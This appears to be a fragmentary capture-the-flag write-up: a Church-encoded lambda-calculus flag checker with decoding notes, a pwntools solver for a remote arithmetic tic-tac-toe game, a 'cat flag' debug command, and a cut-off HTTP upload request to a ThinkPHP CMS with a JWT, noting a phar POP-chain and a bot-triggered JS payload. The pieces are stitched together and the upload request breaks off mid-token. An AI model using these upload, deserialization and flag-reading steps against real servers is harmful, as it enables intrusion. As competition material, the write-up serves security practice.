((lambda s_234 lambda s_14 lambda s_192 ((234)(192))(14))(218))))(((lambda s_74 lambda
s_222 ((74)(222))(74))((lambda s_252 lambda s_170 lambda s_5 ((252)(5))(170))(143)))
(218)))(lambda s_0 lambda s_1 1))(lambda s_149 lambda s_230 149))))(((lambda s_107
lambda s_16 ((lambda s_148 lambda s_218 ((148)(148))(218))(((lambda s_217 lambda s_40
((217)(40))(217))(16))((lambda s_144 lambda s_58 lambda s_148 ((144)(148))(58))(107))))
(((lambda s_2 lambda s_80 ((2)(80))(2))((lambda s_104 lambda s_100 lambda s_92 ((104)
(92))(100))(16)))(107)))(lambda s_1 lambda s_0 1))(lambda s_34 lambda s_98 98))))
(((lambda s_247 lambda s_107 ((lambda s_134 lambda s_130 ((134)(134))(130))(((lambda
s_68 lambda s_110 ((68)(110))(68))(107))((lambda s_16 lambda s_247 lambda s_204 ((16)
(204))(247))(247))))(((lambda s_66 lambda s_56 ((66)(56))(66))((lambda s_195 lambda
s_149 lambda s_64 ((195)(64))(149))(107)))(247)))(lambda s_0 lambda s_1 1))(lambda s_43
lambda s_61 43))))(((lambda s_140 lambda s_222 ((lambda s_118 lambda s_43 ((118)(118))
(43))(((lambda s_135 lambda s_178 ((135)(178))(135))(222))((lambda s_239 lambda s_131
lambda s_137 ((239)(137))(131))(140))))(((lambda s_65 lambda s_12 ((65)(12))(65))
((lambda s_39 lambda s_251 lambda s_108 ((39)(108))(251))(222)))(140)))(lambda s_0
lambda s_1 0))(lambda s_124 lambda s_2 2))))(((lambda s_69 lambda s_248 ((lambda s_184
lambda s_64 ((184)(184))(64))(((lambda s_161 lambda s_24 ((161)(24))(161))(248))
((lambda s_10 lambda s_92 lambda s_98 ((10)(98))(92))(69))))(((lambda s_1 lambda s_56
((1)(56))(1))((lambda s_146 lambda s_10 lambda s_9 ((146)(9))(10))(248)))(69)))(lambda
s_1 lambda s_0 1))(lambda s_67 lambda s_51 51))))(((lambda s_22 lambda s_50 ((lambda
s_135 lambda s_210 ((135)(135))(210))(((lambda s_48 lambda s_164 ((48)(164))(48))(50))
((lambda s_154 lambda s_118 lambda s_49 ((154)(49))(118))(22))))(((lambda s_122 lambda
s_136 ((122)(136))(122))((lambda s_107 lambda s_8 lambda s_165 ((107)(165))(8))(50)))
(22)))(lambda s_1 lambda s_0 1))(lambda s_107 lambda s_116 116))))(((lambda s_220
lambda s_199 ((lambda s_123 lambda s_204 ((123)(123))(204))(((lambda s_248 lambda s_110
((248)(110))(248))(199))((lambda s_4 lambda s_90 lambda s_133 ((4)(133))(90))(220))))
(((lambda s_250 lambda s_111 ((250)(111))(250))((lambda s_161 lambda s_179 lambda s_214
((161)(214))(179))(199)))(220)))(lambda s_0 lambda s_1 0))(lambda s_154 lambda s_175
175))))(((lambda s_6 lambda s_83 ((lambda s_2 lambda s_213 ((2)(2))(213))(((lambda
s_207 lambda s_220 ((207)(220))(207))(83))((lambda s_29 lambda s_99 lambda s_238 ((29)
(238))(99))(6))))(((lambda s_214 lambda s_186 ((214)(186))(214))((lambda s_203 lambda
s_247 lambda s_161 ((203)(161))(247))(83)))(6)))(lambda s_1 lambda s_0 1))(lambda s_235
lambda s_113 113))))(((lambda s_68 lambda s_118 ((lambda s_63 lambda s_186 ((63)(63))
(186))(((lambda s_11 lambda s_75 ((11)(75))(11))(118))((lambda s_79 lambda s_46 lambda
s_15 ((79)(15))(46))(68))))(((lambda s_251 lambda s_211 ((251)(211))(251))((lambda s_26
lambda s_41 lambda s_35 ((26)(35))(41))(118)))(68)))(lambda s_1 lambda s_0 1))(lambda
s_163 lambda s_185 185))))(((lambda s_9 lambda s_239 ((lambda s_246 lambda s_163 ((246)
(246))(163))(((lambda s_175 lambda s_221 ((175)(221))(175))(239))((lambda s_199 lambda
s_54 lambda s_98 ((199)(98))(54))(9))))(((lambda s_178 lambda s_109 ((178)(109))(178))
((lambda s_48 lambda s_61 lambda s_226 ((48)(226))(61))(239)))(9)))(lambda s_1 lambda
s_0 1))(lambda s_14 lambda s_44 44))))(((lambda s_192 lambda s_123 ((lambda s_250
lambda s_66 ((250)(250))(66))(((lambda s_13 lambda s_180 ((13)(180))(13))(123))((lambda
s_58 lambda s_206 lambda s_239 ((58)(239))(206))(192))))(((lambda s_40 lambda s_14
((40)(14))(40))((lambda s_187 lambda s_63 lambda s_61 ((187)(61))(63))(123)))(192)))
(lambda s_1 lambda s_0 1))(lambda s_99 lambda s_194 194))))(((lambda s_218 lambda s_38
((lambda s_180 lambda s_77 ((180)(180))(77))(((lambda s_176 lambda s_1 ((176)(1))(176))
(38))((lambda s_63 lambda s_131 lambda s_99 ((63)(99))(131))(218))))(((lambda s_51
lambda s_148 ((51)(148))(51))((lambda s_40 lambda s_37 lambda s_22 ((40)(22))(37))
(38)))(218)))(lambda s_1 lambda s_0 0))(lambda s_231 lambda s_137 231))))(((lambda
s_162 lambda s_43 ((lambda s_199 lambda s_9 ((199)(199))(9))(((lambda s_51 lambda s_26
((51)(26))(51))(43))((lambda s_84 lambda s_225 lambda s_83 ((84)(83))(225))(162))))
(((lambda s_252 lambda s_112 ((252)(112))(252))((lambda s_80 lambda s_170 lambda s_187
((80)(187))(170))(43)))(162)))(lambda s_0 lambda s_1 0))(lambda s_137 lambda s_115
115))))(((lambda s_79 lambda s_161 ((lambda s_102 lambda s_9 ((102)(102))(9))(((lambda
s_95 lambda s_103 ((95)(103))(95))(161))((lambda s_48 lambda s_37 lambda s_218 ((48)
(218))(37))(79))))(((lambda s_60 lambda s_253 ((60)(253))(60))((lambda s_105 lambda
s_204 lambda s_113 ((105)(113))(204))(161)))(79)))(lambda s_0 lambda s_1 1))(lambda
s_114 lambda s_158 114))))(((lambda s_157 lambda s_210 ((lambda s_112 lambda s_39
((112)(112))(39))(((lambda s_238 lambda s_131 ((238)(131))(238))(210))((lambda s_60
lambda s_32 lambda s_192 ((60)(192))(32))(157))))(((lambda s_41 lambda s_65 ((41)(65))
(41))((lambda s_89 lambda s_31 lambda s_86 ((89)(86))(31))(210)))(157)))(lambda s_0
lambda s_1 0))(lambda s_12 lambda s_70 70))))(((lambda s_216 lambda s_109 ((lambda
s_164 lambda s_252 ((164)(164))(252))(((lambda s_175 lambda s_210 ((175)(210))(175))
(109))((lambda s_77 lambda s_253 lambda s_182 ((77)(182))(253))(216))))(((lambda s_186
lambda s_18 ((186)(18))(186))((lambda s_213 lambda s_206 lambda s_93 ((213)(93))(206))
(109)))(216)))(lambda s_0 lambda s_1 0))(lambda s_59 lambda s_147 147))))(((lambda s_22
lambda s_128 ((lambda s_45 lambda s_226 ((45)(45))(226))(((lambda s_64 lambda s_225
((64)(225))(64))(128))((lambda s_249 lambda s_240 lambda s_148 ((249)(148))(240))
(22))))(((lambda s_233 lambda s_101 ((233)(101))(233))((lambda s_230 lambda s_31 lambda
s_227 ((230)(227))(31))(128)))(22)))(lambda s_0 lambda s_1 1))(lambda s_90 lambda s_142
90))))(((lambda s_69 lambda s_32 ((lambda s_211 lambda s_94 ((211)(211))(94))(((lambda
s_160 lambda s_146 ((160)(146))(160))(32))((lambda s_217 lambda s_190 lambda s_52
((217)(52))(190))(69))))(((lambda s_135 lambda s_75 ((135)(75))(135))((lambda s_222
lambda s_154 lambda s_11 ((222)(11))(154))(32)))(69)))(lambda s_1 lambda s_0 0))(lambda
s_21 lambda s_25 21))))(((lambda s_24 lambda s_192 ((lambda s_234 lambda s_235 ((234)
(234))(235))(((lambda s_115 lambda s_54 ((115)(54))(115))(192))((lambda s_21 lambda
s_20 lambda s_73 ((21)(73))(20))(24))))(((lambda s_156 lambda s_112 ((156)(112))(156))
((lambda s_134 lambda s_214 lambda s_151 ((134)(151))(214))(192)))(24)))(lambda s_0
lambda s_1 0))(lambda s_100 lambda s_37 37))))(((lambda s_254 lambda s_77 ((lambda s_26
lambda s_74 ((26)(26))(74))(((lambda s_9 lambda s_47 ((9)(47))(9))(77))((lambda s_241
lambda s_84 lambda s_12 ((241)(12))(84))(254))))(((lambda s_220 lambda s_147 ((220)
(147))(220))((lambda s_87 lambda s_107 lambda s_142 ((87)(142))(107))(77)))(254)))
(lambda s_1 lambda s_0 1))(lambda s_45 lambda s_1 1))))(((lambda s_218 lambda s_233
((lambda s_12 lambda s_141 ((12)(12))(141))(((lambda s_214 lambda s_4 ((214)(4))(214))
(233))((lambda s_68 lambda s_201 lambda s_170 ((68)(170))(201))(218))))(((lambda s_124
lambda s_37 ((124)(37))(124))((lambda s_107 lambda s_48 lambda s_149 ((107)(149))(48))
(233)))(218)))(lambda s_0 lambda s_1 0))(lambda s_147 lambda s_78 78))))(((lambda s_200
lambda s_97 ((lambda s_176 lambda s_169 ((176)(176))(169))(((lambda s_96 lambda s_179
((96)(179))(96))(97))((lambda s_87 lambda s_101 lambda s_159 ((87)(159))(101))(200))))
(((lambda s_7 lambda s_45 ((7)(45))(7))((lambda s_219 lambda s_118 lambda s_250 ((219)
(250))(118))(97)))(200)))(lambda s_1 lambda s_0 1))(lambda s_62 lambda s_130 130))))
(((lambda s_253 lambda s_104 ((lambda s_65 lambda s_203 ((65)(65))(203))(((lambda s_175
lambda s_238 ((175)(238))(175))(104))((lambda s_36 lambda s_37 lambda s_238 ((36)(238))
(37))(253))))(((lambda s_203 lambda s_113 ((203)(113))(203))((lambda s_222 lambda s_241
lambda s_25 ((222)(25))(241))(104)))(253)))(lambda s_0 lambda s_1 0))(lambda s_138
lambda s_210 210))))(((lambda s_189 lambda s_55 ((lambda s_162 lambda s_242 ((162)
(162))(242))(((lambda s_242 lambda s_201 ((242)(201))(242))(55))((lambda s_80 lambda
s_70 lambda s_117 ((80)(117))(70))(189))))(((lambda s_55 lambda s_183 ((55)(183))(55))
((lambda s_196 lambda s_120 lambda s_224 ((196)(224))(120))(55)))(189)))(lambda s_1
lambda s_0 1))(lambda s_125 lambda s_10 10))))(((lambda s_4 lambda s_14 ((lambda s_244
lambda s_254 ((244)(244))(254))(((lambda s_54 lambda s_220 ((54)(220))(54))(14))
((lambda s_88 lambda s_84 lambda s_82 ((88)(82))(84))(4))))(((lambda s_88 lambda s_183
((88)(183))(88))((lambda s_5 lambda s_66 lambda s_32 ((5)(32))(66))(14)))(4)))(lambda
s_1 lambda s_0 0))(lambda s_222 lambda s_105 222))))(((lambda s_125 lambda s_201
((lambda s_74 lambda s_36 ((74)(74))(36))(((lambda s_98 lambda s_122 ((98)(122))(98))
(201))((lambda s_20 lambda s_42 lambda s_122 ((20)(122))(42))(125))))(((lambda s_219
lambda s_117 ((219)(117))(219))((lambda s_51 lambda s_60 lambda s_249 ((51)(249))(60))
(201)))(125)))(lambda s_1 lambda s_0 1))(lambda s_5 lambda s_102 102))))(((lambda s_173
lambda s_217 ((lambda s_178 lambda s_126 ((178)(178))(126))(((lambda s_144 lambda s_219
((144)(219))(144))(217))((lambda s_159 lambda s_179 lambda s_222 ((159)(222))(179))
(173))))(((lambda s_247 lambda s_164 ((247)(164))(247))((lambda s_122 lambda s_123
lambda s_8 ((122)(8))(123))(217)))(173)))(lambda s_0 lambda s_1 1))(lambda s_20 lambda
s_165 20))))(((lambda s_132 lambda s_128 ((lambda s_215 lambda s_99 ((215)(215))(99))
(((lambda s_67 lambda s_122 ((67)(122))(67))(128))((lambda s_14 lambda s_197 lambda
s_255 ((14)(255))(197))(132))))(((lambda s_126 lambda s_199 ((126)(199))(126))((lambda
s_62 lambda s_58 lambda s_26 ((62)(26))(58))(128)))(132)))(lambda s_0 lambda s_1 1))
(lambda s_197 lambda s_119 197))))(((lambda s_39 lambda s_215 ((lambda s_181 lambda s_0
((181)(181))(0))(((lambda s_148 lambda s_237 ((148)(237))(148))(215))((lambda s_98
lambda s_6 lambda s_43 ((98)(43))(6))(39))))(((lambda s_231 lambda s_103 ((231)(103))
(231))((lambda s_170 lambda s_20 lambda s_154 ((170)(154))(20))(215)))(39)))(lambda s_1
lambda s_0 1))(lambda s_18 lambda s_51 51))))(((lambda s_53 lambda s_3 ((lambda s_132
lambda s_53 ((132)(132))(53))(((lambda s_148 lambda s_11 ((148)(11))(148))(3))((lambda
s_213 lambda s_61 lambda s_25 ((213)(25))(61))(53))))(((lambda s_202 lambda s_113
((202)(113))(202))((lambda s_155 lambda s_75 lambda s_103 ((155)(103))(75))(3)))(53)))
(lambda s_0 lambda s_1 1))(lambda s_183 lambda s_252 183))))(((lambda s_211 lambda s_87
((lambda s_115 lambda s_88 ((115)(115))(88))(((lambda s_162 lambda s_127 ((162)(127))
(162))(87))((lambda s_32 lambda s_184 lambda s_87 ((32)(87))(184))(211))))(((lambda
s_171 lambda s_37 ((171)(37))(171))((lambda s_10 lambda s_134 lambda s_234 ((10)(234))
The dump is built entirely from Church booleans:
and = (lambda x lambda y x y x)
not = (lambda p lambda a lambda b p b a)
A Church boolean takes two arguments: true selects the first, false the second.
So a term such as (lambda s_1 lambda s_0 1) is true (its body picks s_1),
while a body of 0 picks s_0 and means false.
The free variables like 137 are the unknown flag bits: each one is and-ed with
true and xor'd against a known constant bit, where
xor x y = (x & ~y) | (~x & y)
Applying true unwraps the flag term: (lambda s_108 lambda s_226 108) is true,
and (lambda s_1 lambda s_0 137) wraps the flag variable 137.
Reading off the known constant bits and grouping the flag bits 8 at a time
recovers the flag bytes.
3*3
(134))(87)))(211)))(lambda s_1 lambda s_0 0))(lambda s_108 lambda s_226 108))
((lambda s_91 lambda s_70 ((91)(70))(91))
((lambda s_10 lambda s_134 lambda s_234 ((10)(234))(134))
(lambda s_108 lambda s_226 108)
((lambda x lambda y ( (or ((and y) (not x))) ((and (not y)) x) ) lambda s_1 lambda s_0
137) true)
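The obfuscated terms above are Church encodings. As a sketch of how the booleans and the bitwise xor in the notes behave (plain Python, the names are mine):

```python
# Church booleans: a boolean is a two-argument selector.
true = lambda x: lambda y: x    # selects its first argument
false = lambda x: lambda y: y   # selects its second argument

# As in the notes: and = lambda x lambda y (x y x), not = lambda p lambda a lambda b (p b a)
AND = lambda x: lambda y: x(y)(x)
NOT = lambda p: lambda a: lambda b: p(b)(a)

def to_bool(church):
    # Decode a Church boolean back into a Python bool.
    return church(True)(False)

def xor_bits(x, y):
    # The bitwise xor the checker builds: x&~y | (~x&y)
    return (x & ~y) | (~x & y)
```

Applying `to_bool` to the deobfuscated expression is how each flag bit check collapses to a plain true/false.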
from pwn import *
import random
import socks  # PySocks, needed for context.proxy below
context.proxy = (socks.SOCKS5, '146.56.247.105', 8010)
def move(board, x, y, val):
global boards
p.sendlineafter('>', f'{board} {x} {y} {val}')
boards[board][x][y] = val
check_solved1()
def get_move():
global boards, opp_choice
p.recvuntil('< ')
board, x, y, val = map(int, p.recvline().split())
opp_choice = board
print('opp:', board, x, y, val)
boards[board][x][y] = val
def check_solved():
# global boards
global solved
for board in range(len(boards)):
p.recvuntil(f'board {board}: ')
res = p.recvline().decode()
if 'uncomplete' in res:
solved[board] = False
else:
solved[board] = True
for board in range(len(boards)):
if solved[board]:
continue
flag = True
for row in range(3):
for col in range(3):
if boards[board][row][col] == 0:
flag = False
if flag:
solved[board] = True
print(solved)
def check_solved1():
# global boards
global solved
for board in range(len(boards)):
if solved[board]:
continue
flag = True
for row in range(3):
for col in range(3):
if boards[board][row][col] == 0:
flag = False
if flag:
solved[board] = True
# print(solved)
unknown_conditions = [[1,2,4],[4,2,1],[1,3,9],[9,3,1],[2,4,8],[8,4,2],[4,6,9],[9,6,4]]
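The `unknown_conditions` table above lists the geometric triples (1,2,4 / 1,3,9 / 2,4,8 / 4,6,9, each direction listed separately), while `judge()` below completes a line as an arithmetic progression (third cell = 2·b − a). A small illustrative helper, not part of the exploit (the names are mine):

```python
# Triples that win by ratio rather than by common difference,
# mirroring unknown_conditions above.
GEOMETRIC = [(1, 2, 4), (1, 3, 9), (2, 4, 8), (4, 6, 9)]

def complete_triple(a, b):
    """Given two leading cells a, b of a line, return the winning third cells (1-9)."""
    candidates = set()
    c = 2 * b - a  # arithmetic progression a, b, c with common difference b - a
    if 1 <= c <= 9:
        candidates.add(c)
    for x, y, z in GEOMETRIC:
        if (a, b) == (x, y):
            candidates.add(z)
    return candidates
```

For example, a row starting 1, 2 can be closed with 3 (arithmetic) or 4 (geometric), which is exactly the pair of checks `judge()` runs per row and column.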
def judge():
global boards
global solved
global opp_choice
# Attack
# for board in range(len(boards)-1,-1,-1):
for board in [opp_choice]:
# if solved[board]:
# continue
# prevent draw here
# rest = 0
# for b in range(len(boards)):
# if not solved[b] and b != board:
# for row in range(3):
# for col in range(3):
# if boards[b][row][col] == 0:
# rest += 1
# if rest %2 == 1 and solved.count(False) > 1:
# continue
# Attack on row
for row in range(3):
if boards[board][row][0] and boards[board][row][1] and boards[board][row]
[2] == 0:
if 0 < boards[board][row][1] - (boards[board][row][0]-boards[board]
[row][1]) < 10:
return 1, board, row, 2, boards[board][row][1] - (boards[board]
[row][0]-boards[board][row][1])
for condition in unknown_conditions:
if boards[board][row][0] == condition[0] and boards[board][row][1]
== condition[1]:
return 1, board, row, 2, condition[2]
elif boards[board][row][0] and boards[board][row][2] and boards[board][row]
[1] == 0:
if (boards[board][row][2]-boards[board][row][0])%2==0:
return 1, board, row, 1, boards[board][row][0] - (boards[board]
[row][0]-boards[board][row][2]+1)//2
for condition in unknown_conditions:
if boards[board][row][0] == condition[0] and boards[board][row][2]
== condition[2]:
return 1, board, row, 1, condition[1]
elif boards[board][row][1] and boards[board][row][2] and boards[board][row]
[0] == 0:
if 0 < boards[board][row][1] - (boards[board][row][2]-boards[board]
[row][1]) < 10:
return 1, board, row, 0, boards[board][row][1] - (boards[board]
[row][2]-boards[board][row][1])
for condition in unknown_conditions:
if boards[board][row][1] == condition[1] and boards[board][row][2]
== condition[2]:
return 1, board, row, 0, condition[0]
# Attack on col
for col in range(3):
if boards[board][0][col] and boards[board][1][col] and boards[board][2]
[col] == 0:
if 0 < boards[board][1][col] - (boards[board][0][col]-boards[board][1]
[col]) < 10:
return 1, board, 2, col, boards[board][1][col] - (boards[board][0]
[col]-boards[board][1][col])
for condition in unknown_conditions:
if boards[board][0][col] == condition[0] and boards[board][1][col]
== condition[1]:
return 1, board, 2, col, condition[2]
elif boards[board][0][col] and boards[board][2][col] and boards[board][1]
[col] == 0:
if (boards[board][2][col]-boards[board][0][col])%2==0:
return 1, board, 1, col, boards[board][0][col] - (boards[board][0]
[col]-boards[board][2][col]+1)//2
for condition in unknown_conditions:
if boards[board][0][col] == condition[0] and boards[board][2][col]
== condition[2]:
return 1, board, 1, col, condition[1]
elif boards[board][1][col] and boards[board][2][col] and boards[board][0]
[col] == 0:
if 0 < boards[board][1][col] - (boards[board][2][col]-boards[board][1]
[col]) < 10:
return 1, board, 0, col, boards[board][1][col] - (boards[board][2]
[col]-boards[board][1][col])
for condition in unknown_conditions:
if boards[board][2][col] == condition[2] and boards[board][1][col]
== condition[1]:
return 1, board, 0, col, condition[0]
# Defend
# for board in range(len(boards)):
for board in [opp_choice]:
if solved[board]:
continue
for row in range(3):
for col in range(3):
if boards[board][row][col]:
continue
available = set(range(1,10))
if col == 0 and boards[board][row][2]==0 and boards[board][row][1]:
needRemove = set()
for val in available:
if 0 < boards[board][row][1] - (val-boards[board][row][1]) <
10:
# print(f"Removing {val} due to rule 1")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][row][1] == condition[1]:
needRemove.add(condition[0])
available -= needRemove
elif col == 0 and boards[board][row][1]==0 and boards[board][row][2]:
needRemove = set()
for val in available:
if (boards[board][row][2]-val)%2==0:
# print(f"Removing {val} due to rule 2")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][row][2] == condition[2]:
needRemove.add(condition[0])
available -= needRemove
elif col == 1 and boards[board][row][0]==0 and boards[board][row][2]:
needRemove = set()
for val in available:
if 0 < val - (boards[board][row][2]-val) < 10:
# print(f"Removing {val} due to rule 3")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][row][2] == condition[2]:
needRemove.add(condition[1])
available -= needRemove
elif col == 1 and boards[board][row][2]==0 and boards[board][row][0]:
needRemove = set()
for val in available:
if 0 < val - (boards[board][row][0]-val) < 10:
# print(f"Removing {val} due to rule 4")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][row][0] == condition[0]:
needRemove.add(condition[1])
available -= needRemove
elif col == 2 and boards[board][row][0]==0 and boards[board][row][1]:
needRemove = set()
for val in available:
if 0 < boards[board][row][1] - (val-boards[board][row][1]) <
10:
# print(f"Removing {val} due to rule 5")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][row][1] == condition[1]:
needRemove.add(condition[2])
available -= needRemove
elif col == 2 and boards[board][row][1]==0 and boards[board][row][0]:
needRemove = set()
for val in available:
if (val-boards[board][row][0])%2==0:
# print(f"Removing {val} due to rule 6")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][row][0] == condition[0]:
needRemove.add(condition[2])
available -= needRemove
if row == 0 and boards[board][2][col]==0 and boards[board][1][col]:
needRemove = set()
for val in available:
if 0 < boards[board][1][col] - (val-boards[board][1][col]) <
10:
# print(f"Removing {val} due to rule 7")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][1][col] == condition[1]:
needRemove.add(condition[0])
available -= needRemove
elif row == 0 and boards[board][1][col]==0 and boards[board][2][col]:
needRemove = set()
for val in available:
if (boards[board][2][col]-val)%2==0:
# print(f"Removing {val} due to rule 8")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][2][col] == condition[2]:
needRemove.add(condition[0])
available -= needRemove
elif row == 1 and boards[board][0][col]==0 and boards[board][2][col]:
needRemove = set()
for val in available:
if 0 < val - (boards[board][2][col]-val) < 10:
# print(f"Removing {val} due to rule 9")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][2][col] == condition[2]:
needRemove.add(condition[1])
available -= needRemove
elif row == 1 and boards[board][2][col]==0 and boards[board][0][col]:
needRemove = set()
for val in available:
if 0 < val - (boards[board][0][col]-val) < 10:
# print(f"Removing {val} due to rule 10")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][0][col] == condition[0]:
needRemove.add(condition[1])
available -= needRemove
elif row == 2 and boards[board][0][col]==0 and boards[board][1][col]:
needRemove = set()
for val in available:
if 0 < boards[board][1][col] - (val-boards[board][1][col]) <
10:
# print(f"Removing {val} due to rule 11")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][1][col] == condition[1]:
needRemove.add(condition[2])
available -= needRemove
elif row == 2 and boards[board][1][col]==0 and boards[board][0][col]:
needRemove = set()
for val in available:
if (val-boards[board][0][col])%2==0:
# print(f"Removing {val} due to rule 12")
needRemove.add(val)
for condition in unknown_conditions:
if boards[board][0][col] == condition[0]:
needRemove.add(condition[2])
available -= needRemove
if boards[board][row][0] and boards[board][row][1] and col == 2:
needRemove = set()
if 0 < boards[board][row][1] - (boards[board][row][0]-boards[board]
[row][1]) < 10:
needRemove.add(boards[board][row][1] - (boards[board][row][0]-
boards[board][row][1]))
for condition in unknown_conditions:
if boards[board][row][0] == condition[0] and boards[board][row]
[1] == condition[1]:
needRemove.add(condition[2])
available -= needRemove
elif boards[board][row][0] and boards[board][row][2] and col == 1:
needRemove = set()
if (boards[board][row][2]-boards[board][row][0])%2==0:
needRemove.add(boards[board][row][0] - (boards[board][row][0]-
boards[board][row][2]+1)//2)
for condition in unknown_conditions:
if boards[board][row][0] == condition[0] and boards[board][row]
[2] == condition[2]:
needRemove.add(condition[1])
available -= needRemove
elif boards[board][row][1] and boards[board][row][2] and col == 0:
needRemove = set()
if 0 < boards[board][row][1] - (boards[board][row][2]-boards[board]
[row][1]) < 10:
needRemove.add(boards[board][row][1] - (boards[board][row][2]-
boards[board][row][1]))
for condition in unknown_conditions:
if boards[board][row][1] == condition[1] and boards[board][row]
[2] == condition[2]:
needRemove.add(condition[0])
available -= needRemove
if boards[board][0][col] and boards[board][1][col] and row == 2:
needRemove = set()
if 0 < boards[board][1][col] - (boards[board][0][col]-boards[board]
[1][col]) < 10:
needRemove.add(boards[board][1][col] - (boards[board][0][col]-
boards[board][1][col]))
for condition in unknown_conditions:
if boards[board][0][col] == condition[0] and boards[board][1]
[col] == condition[1]:
needRemove.add(condition[2])
available -= needRemove
elif boards[board][0][col] and boards[board][2][col] and row == 1:
needRemove = set()
if (boards[board][2][col]-boards[board][0][col])%2==0:
needRemove.add(boards[board][0][col] - (boards[board][0][col]-
boards[board][2][col]+1)//2)
for condition in unknown_conditions:
if boards[board][0][col] == condition[0] and boards[board][2]
[col] == condition[2]:
needRemove.add(condition[1])
available -= needRemove
elif boards[board][1][col] and boards[board][2][col] and row == 0:
needRemove = set()
if 0 < boards[board][1][col] - (boards[board][2][col]-boards[board]
[1][col]) < 10:
needRemove.add(boards[board][1][col] - (boards[board][2][col]-
boards[board][1][col]))
for condition in unknown_conditions:
if boards[board][2][col] == condition[2] and boards[board][1]
[col] == condition[1]:
needRemove.add(condition[0])
available -= needRemove
if available:
print(row,col,available)
return 0, board, row, col, random.choice(list(available))
    # Failed to defend...
# for board in range(len(boards)):
for board in [opp_choice]:
if solved[board]:
continue
for row in range(3):
for col in range(3):
if boards[board][row][col] == 0:
return 2, board, row, col, 1
opp_choice = 0
context.log_level = 'debug'
for _ in range(1):
p = remote("10.10.10.103", 3000)
p.sendlineafter('verbose? (y/n)', 'y')
numBoards = [1,3,9,13]
level = 0
boards = [[[0]*3 for row in range(3)] for board in range(numBoards[level])]
solved = [False for board in range(numBoards[level])]
print(boards)
move(0,1,1,5)
while not all(solved):
get_move()
check_solved()
if all(solved):
break
print(boards)
attack, board, x,y,val = judge()
if attack == 1:
print('Attack!')
solved[board] = True
elif attack == 0:
print('Defend!')
elif attack == 2:
print('WTF, failed to defense...')
print('my:',board, x, y, val)
move(board, x, y, val)
status = p.recvuntil('game').decode()
if 'lose' in status:
p.close()
continue
level = 1
boards = [[[0]*3 for row in range(3)] for board in range(numBoards[level])]
solved = [False for board in range(numBoards[level])]
for board in range(numBoards[level]):
p.recvuntil('uncomplete')
p.recvline()
a,b,c = map(int,p.recvline().strip().decode())
boards[board][0][0] = a
boards[board][0][1] = b
boards[board][0][2] = c
a,b,c = map(int,p.recvline().strip().decode())
boards[board][1][0] = a
boards[board][1][1] = b
boards[board][1][2] = c
a,b,c = map(int,p.recvline().strip().decode())
boards[board][2][0] = a
boards[board][2][1] = b
boards[board][2][2] = c
print(boards)
move(0,1,1,5)
while not all(solved):
get_move()
check_solved()
if all(solved):
break
print(boards)
attack, board, x,y,val = judge()
if attack == 1:
print('Attack!')
solved[board] = True
elif attack == 0:
print('Defend!')
elif attack == 2:
print('WTF, failed to defense...')
print('my:',board, x, y, val)
move(board, x, y, val)
status = p.recvuntil('game').decode()
if 'lose' in status:
p.close()
continue
level = 2
boards = [[[0]*3 for row in range(3)] for board in range(numBoards[level])]
solved = [False for board in range(numBoards[level])]
for board in range(numBoards[level]):
p.recvuntil('uncomplete')
p.recvline()
a,b,c = map(int,p.recvline().strip().decode())
boards[board][0][0] = a
boards[board][0][1] = b
boards[board][0][2] = c
a,b,c = map(int,p.recvline().strip().decode())
boards[board][1][0] = a
boards[board][1][1] = b
boards[board][1][2] = c
a,b,c = map(int,p.recvline().strip().decode())
boards[board][2][0] = a
boards[board][2][1] = b
boards[board][2][2] = c
print(boards)
move(0,1,1,5)
while not all(solved):
# while solved.count(False) > 1:
print(solved)
get_move()
check_solved()
if all(solved):
break
print(boards)
attack, board, x,y,val = judge()
if attack == 1:
print('Attack!')
solved[board] = True
elif attack == 0:
print('Defend!')
elif attack == 2:
print('WTF, failed to defense...')
print('my:',board, x, y, val)
move(board, x, y, val)
status = p.recvuntil('game').decode()
if 'lose' in status:
p.close()
continue
level = 3
boards = [[[0]*3 for row in range(3)] for board in range(numBoards[level])]
solved = [False for board in range(numBoards[level])]
for board in range(numBoards[level]):
p.recvuntil('uncomplete')
p.recvline()
a,b,c = map(int,p.recvline().strip().decode())
boards[board][0][0] = a
boards[board][0][1] = b
boards[board][0][2] = c
a,b,c = map(int,p.recvline().strip().decode())
boards[board][1][0] = a
boards[board][1][1] = b
boards[board][1][2] = c
a,b,c = map(int,p.recvline().strip().decode())
boards[board][2][0] = a
boards[board][2][1] = b
boards[board][2][2] = c
print(boards)
move(0,1,1,5)
while not all(solved):
# while solved.count(False) > 1:
print(solved)
get_move()
check_solved()
if all(solved):
break
print(boards)
attack, board, x,y,val = judge()
if attack == 1:
print('Attack!')
solved[board] = True
elif attack == 0:
print('Defend!')
elif attack == 2:
print('WTF, failed to defense...')
print('my:',board, x, y, val)
move(board, x, y, val)
status = p.recvuntil('game').decode()
if 'lose' in status:
p.close()
continue
p.interactive()
babydebug
!cat flag
easycms
api
POST /index.php?s=/api/Base/upload HTTP/1.1
Host: 172.35.13.101:31337
Pragma: no-cache
Cache-Control: no-cache
Notes: ThinkPHP 6 (tp6) POP chain triggered via phar; a spider (bot) visits
the page and executes the JS payload.
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/91.0.4472.77 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,
*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=69fbea77e5f61e0fbabb45fdd786e5ee
authorization:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJjbGllbnQueGhhZG1pbiIsImF1ZCI6InNlcnZlci
54aGFkbWluIiwiaWF0IjoxNjIyMzQxNjYzLCJleHAiOjEwMDAwMTYyMjM0MTY2MiwidWlkIjoxfQ.e5fhbPtljQ
